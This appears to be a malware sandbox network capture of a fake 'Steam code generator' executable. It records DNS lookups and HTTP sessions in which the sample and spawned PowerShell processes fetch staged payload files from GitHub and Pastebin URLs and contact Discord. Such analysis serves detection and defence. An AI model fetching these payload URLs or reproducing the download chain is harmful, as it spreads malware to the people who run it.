                                                                                                                        Oct 15, 2024 15:52:54.939757109 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.939841032 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.940093994 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.943314075 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.943348885 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.985698938 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.145740986 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.145824909 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.147535086 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.147559881 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.147820950 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.148788929 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.195399046 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.195447922 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.195453882 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.501302958 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.501425028 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.501507044 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.577661037 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.577758074 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.580569983 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.580589056 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.580913067 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.583985090 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.587440968 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.635395050 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.733417034 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.733736038 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.733923912 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.742352009 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.755759954 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:55.760541916 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.760626078 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:55.760896921 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:55.767967939 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.401554108 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.401870012 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.402698994 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.402760983 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.402904034 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.403223991 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.403244972 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.407108068 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.407603025 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.080512047 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.080593109 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.082036972 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.082046986 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.082494974 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.083523035 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.131408930 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213059902 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213310957 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213419914 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213490009 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.213510990 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213541985 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213587999 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.213634968 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213854074 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213943005 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.271121025 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:02.058430910 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.064198017 CEST8049938172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.064277887 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.064939022 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.069808006 CEST8049938172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.705881119 CEST8049938172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.737350941 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.737397909 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.738502979 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.744329929 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.744343996 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.751441956 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.378603935 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.378679991 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.380146027 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.380156040 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.380553007 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.386852026 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.431410074 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.531838894 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.532058001 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.532110929 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.550281048 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.569597006 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:03.574527025 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.574599028 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:03.574775934 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:03.580244064 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.167843103 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.167855978 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.167962074 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.168065071 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.168950081 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.168987989 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.169590950 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.169877052 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.169895887 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.172987938 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.840444088 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.840544939 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.845555067 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.845582962 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.846268892 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.847640038 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.891402960 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.976908922 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.976984024 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977057934 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977089882 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977108955 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.977130890 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977145910 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.979052067 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.979104996 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.979114056 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.986114979 CEST44349952185.199.109.133192.168.2.6
Oct 15, 2024 15:53:04.987348080 CEST  49952  443    192.168.2.6      185.199.109.133
Oct 15, 2024 15:53:05.007538080 CEST  49952  443    192.168.2.6      185.199.109.133
Oct 15, 2024 15:53:09.708997965 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:09.709044933 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:09.709254980 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:09.709727049 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:09.709742069 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.328188896 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.328269958 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:10.329797029 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:10.329808950 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.330133915 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.331051111 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:10.371409893 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.371469021 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:10.371484041 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.691374063 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.691708088 CEST  443    49983  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:10.691786051 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:10.698138952 CEST  49983  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:15.717478037 CEST  49894  80     192.168.2.6      172.67.19.24
Oct 15, 2024 15:53:17.355307102 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:17.355341911 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:17.355420113 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:17.355802059 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:17.355814934 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:17.977066994 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:17.977161884 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:17.978519917 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:17.978528023 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:17.978868961 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:17.979660988 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:18.023439884 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:18.023525953 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:18.023541927 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:18.245914936 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:18.246030092 CEST  443    49997  162.159.138.232  192.168.2.6
Oct 15, 2024 15:53:18.246099949 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:18.252129078 CEST  49997  443    192.168.2.6      162.159.138.232
Oct 15, 2024 15:53:23.289105892 CEST  49938  80     192.168.2.6      172.67.19.24
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Oct 15, 2024 15:52:13.591018915 CEST  59603        53         192.168.2.6  1.1.1.1
Oct 15, 2024 15:52:13.598275900 CEST  53           59603      1.1.1.1      192.168.2.6
Oct 15, 2024 15:52:15.227530003 CEST  60765        53         192.168.2.6  1.1.1.1
Oct 15, 2024 15:52:15.234906912 CEST  53           60765      1.1.1.1      192.168.2.6
Oct 15, 2024 15:52:34.911366940 CEST  60002        53         192.168.2.6  1.1.1.1
Oct 15, 2024 15:52:34.918579102 CEST  53           60002      1.1.1.1      192.168.2.6
Oct 15, 2024 15:52:54.309659004 CEST  59327        53         192.168.2.6  1.1.1.1
Oct 15, 2024 15:52:54.316939116 CEST  53           59327      1.1.1.1      192.168.2.6
Oct 15, 2024 15:52:54.509016991 CEST  52245        53         192.168.2.6  1.1.1.1
Oct 15, 2024 15:52:54.515860081 CEST  53           52245      1.1.1.1      192.168.2.6
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                           Type            Class        DNS over HTTPS
Oct 15, 2024 15:52:13.591018915 CEST  192.168.2.6  1.1.1.1  0x3d5c    Standard query (0)  github.com                     A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:15.227530003 CEST  192.168.2.6  1.1.1.1  0x10d     Standard query (0)  objects.githubusercontent.com  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:34.911366940 CEST  192.168.2.6  1.1.1.1  0x5278    Standard query (0)  raw.githubusercontent.com      A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.309659004 CEST  192.168.2.6  1.1.1.1  0xa5af    Standard query (0)  pastebin.com                   A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.509016991 CEST  192.168.2.6  1.1.1.1  0x7fbd    Standard query (0)  discord.com                    A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                           CName  Address          Type            Class        DNS over HTTPS
Oct 15, 2024 15:52:13.598275900 CEST  1.1.1.1    192.168.2.6  0x3d5c    No error (0)  github.com                            140.82.121.3     A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:15.234906912 CEST  1.1.1.1    192.168.2.6  0x10d     No error (0)  objects.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:15.234906912 CEST  1.1.1.1    192.168.2.6  0x10d     No error (0)  objects.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:15.234906912 CEST  1.1.1.1    192.168.2.6  0x10d     No error (0)  objects.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:15.234906912 CEST  1.1.1.1    192.168.2.6  0x10d     No error (0)  objects.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:34.918579102 CEST  1.1.1.1    192.168.2.6  0x5278    No error (0)  raw.githubusercontent.com             185.199.109.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:34.918579102 CEST  1.1.1.1    192.168.2.6  0x5278    No error (0)  raw.githubusercontent.com             185.199.108.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:34.918579102 CEST  1.1.1.1    192.168.2.6  0x5278    No error (0)  raw.githubusercontent.com             185.199.111.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:34.918579102 CEST  1.1.1.1    192.168.2.6  0x5278    No error (0)  raw.githubusercontent.com             185.199.110.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.316939116 CEST  1.1.1.1    192.168.2.6  0xa5af    No error (0)  pastebin.com                          172.67.19.24     A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.316939116 CEST  1.1.1.1    192.168.2.6  0xa5af    No error (0)  pastebin.com                          104.20.3.235     A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.316939116 CEST  1.1.1.1    192.168.2.6  0xa5af    No error (0)  pastebin.com                          104.20.4.235     A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.515860081 CEST  1.1.1.1    192.168.2.6  0x7fbd    No error (0)  discord.com                           162.159.138.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.515860081 CEST  1.1.1.1    192.168.2.6  0x7fbd    No error (0)  discord.com                           162.159.136.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.515860081 CEST  1.1.1.1    192.168.2.6  0x7fbd    No error (0)  discord.com                           162.159.135.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.515860081 CEST  1.1.1.1    192.168.2.6  0x7fbd    No error (0)  discord.com                           162.159.137.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 15:52:54.515860081 CEST  1.1.1.1    192.168.2.6  0x7fbd    No error (0)  discord.com                           162.159.128.233  A (IP address)  IN (0x0001)  false
• github.com
• objects.githubusercontent.com
• raw.githubusercontent.com
• discord.com
• pastebin.com
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.6  49791        185.199.109.133  80                4372  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 15:52:34.942439079 CEST  223                OUT        GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
Oct 15, 2024 15:52:35.551342964 CEST  542                IN         HTTP/1.1 301 Moved Permanently
    Connection: close
    Content-Length: 0
    Server: Varnish
    Retry-After: 0
    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 13:52:35 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdal2120121-DFW
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1729000355.484426,VS0,VE0
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    Expires: Tue, 15 Oct 2024 13:57:35 GMT
    Vary: Authorization,Accept-Encoding


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
1           192.168.2.6  49894        172.67.19.24    80                420  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 15:52:54.331157923 CEST  169                OUT        GET /raw/sA04Mwk2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
Oct 15, 2024 15:52:54.937272072 CEST  472                IN         HTTP/1.1 301 Moved Permanently
    Date: Tue, 15 Oct 2024 13:52:54 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Tue, 15 Oct 2024 14:52:54 GMT
    Location: https://pastebin.com/raw/sA04Mwk2
    Server: cloudflare
    CF-RAY: 8d304ad6e924e7fb-DFW
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
2           192.168.2.6  49906        185.199.109.133  80                420  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 15:52:55.760896921 CEST  222                OUT        GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
Oct 15, 2024 15:52:56.401554108 CEST  541                IN         HTTP/1.1 301 Moved Permanently
    Connection: close
    Content-Length: 0
    Server: Varnish
    Retry-After: 0
    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 13:52:56 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdfw8210152-DFW
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1729000376.326815,VS0,VE0
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    Expires: Tue, 15 Oct 2024 13:57:56 GMT
    Vary: Authorization,Accept-Encoding


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49938        172.67.19.24    80                5576  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 15:53:02.064939022 CEST  169                OUT        GET /raw/sA04Mwk2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
Oct 15, 2024 15:53:02.705881119 CEST  472                IN         HTTP/1.1 301 Moved Permanently
    Date: Tue, 15 Oct 2024 13:53:02 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Tue, 15 Oct 2024 14:53:02 GMT
    Location: https://pastebin.com/raw/sA04Mwk2
    Server: cloudflare
    CF-RAY: 8d304b075e578788-DFW
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
4           192.168.2.6  49950        185.199.109.133  80                5576  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 15:53:03.574775934 CEST  222                OUT        GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
Oct 15, 2024 15:53:04.167843103 CEST  541                IN         HTTP/1.1 301 Moved Permanently
    Connection: close
    Content-Length: 0
    Server: Varnish
    Retry-After: 0
    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 13:53:04 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdal2120125-DFW
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1729000384.100886,VS0,VE0
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    Expires: Tue, 15 Oct 2024 13:58:04 GMT
    Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 140.82.121.3 | 443 | 6628 | C:\Users\user\Desktop\steamcodegenerator.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:52:14 UTC | 124 | OUT | GET /user-attachments/files/17267811/stm.txt HTTP/1.1
                                                                                                                        User-Agent: Downloader
                                                                                                                        Host: github.com
                                                                                                                        Cache-Control: no-cache
2024-10-15 13:52:15 UTC | 940 | IN | HTTP/1.1 302 Found
                                                                                                                        Server: GitHub.com
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:14 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                        Location: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135214Z&X-Amz-Expires=300&X-Amz-Signature=25afd796b2e8a581e90ca77d6c3579553f304f13e0def3361890827057d8a907&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
